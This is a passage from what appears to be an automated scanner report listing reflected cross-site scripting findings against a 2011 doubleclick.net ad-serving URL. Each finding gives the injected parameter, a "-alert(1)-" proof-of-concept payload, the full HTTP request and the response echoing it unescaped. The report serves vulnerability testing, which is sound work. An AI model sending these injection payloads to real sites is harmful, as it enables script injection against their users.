.net/click%3Bh%3Dv8/3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US97c91"-alert(1)-"12af05d6124&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAA
...[SNIP]...

3.201. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [nd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76e70"-alert(1)-"5f8ba91465f was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=176e70"-alert(1)-"5f8ba91465f&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=176e70"-alert(1)-"5f8ba91465f&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.1
...[SNIP]...

3.202. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5e94"-alert(1)-"672982ddc8e was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253af5e94"-alert(1)-"672982ddc8e&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253af5e94"-alert(1)-"672982ddc8e&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=m
...[SNIP]...

3.203. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c8d5"-alert(1)-"1adcf2285e9 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=9c8d5"-alert(1)-"1adcf2285e9&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
9853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=9c8d5"-alert(1)-"1adcf2285e9&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.htm
...[SNIP]...

3.204. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eaae"-alert(1)-"b85f9dd3226 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com2eaae"-alert(1)-"b85f9dd3226&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com2eaae"-alert(1)-"b85f9dd3226&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-product
...[SNIP]...

3.205. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd82a"-alert(1)-"527f20e513 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2cd82a"-alert(1)-"527f20e513&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3af6/17/152/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2cd82a"-alert(1)-"527f20e513&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJ
...[SNIP]...

3.206. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6142"-alert(1)-"256dabadf78 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.comf6142"-alert(1)-"256dabadf78&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.comf6142"-alert(1)-"256dabadf78&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm
...[SNIP]...

3.207. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e15d"-alert(1)-"86cedb662e5 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@6e15d"-alert(1)-"86cedb662e5&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
ite=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@6e15d"-alert(1)-"86cedb662e5&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094144_240360897_41852066");
var wmode = "opaque";
...[SNIP]...

3.208. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 904b8"-alert(1)-"9c8a7d52c2b was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=904b8"-alert(1)-"9c8a7d52c2b&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=904b8"-alert(1)-"9c8a7d52c2b&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&
...[SNIP]...

3.209. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 801e3"-alert(1)-"324ce86438a was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100801e3"-alert(1)-"324ce86438a&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100801e3"-alert(1)-"324ce86438a&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http
...[SNIP]...

3.210. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fedf"-alert(1)-"f027a765496 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=5fedf"-alert(1)-"f027a765496&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=5fedf"-alert(1)-"f027a765496&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go
...[SNIP]...

3.211. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfb97"-alert(1)-"232cf4defa8 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000cfb97"-alert(1)-"232cf4defa8&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
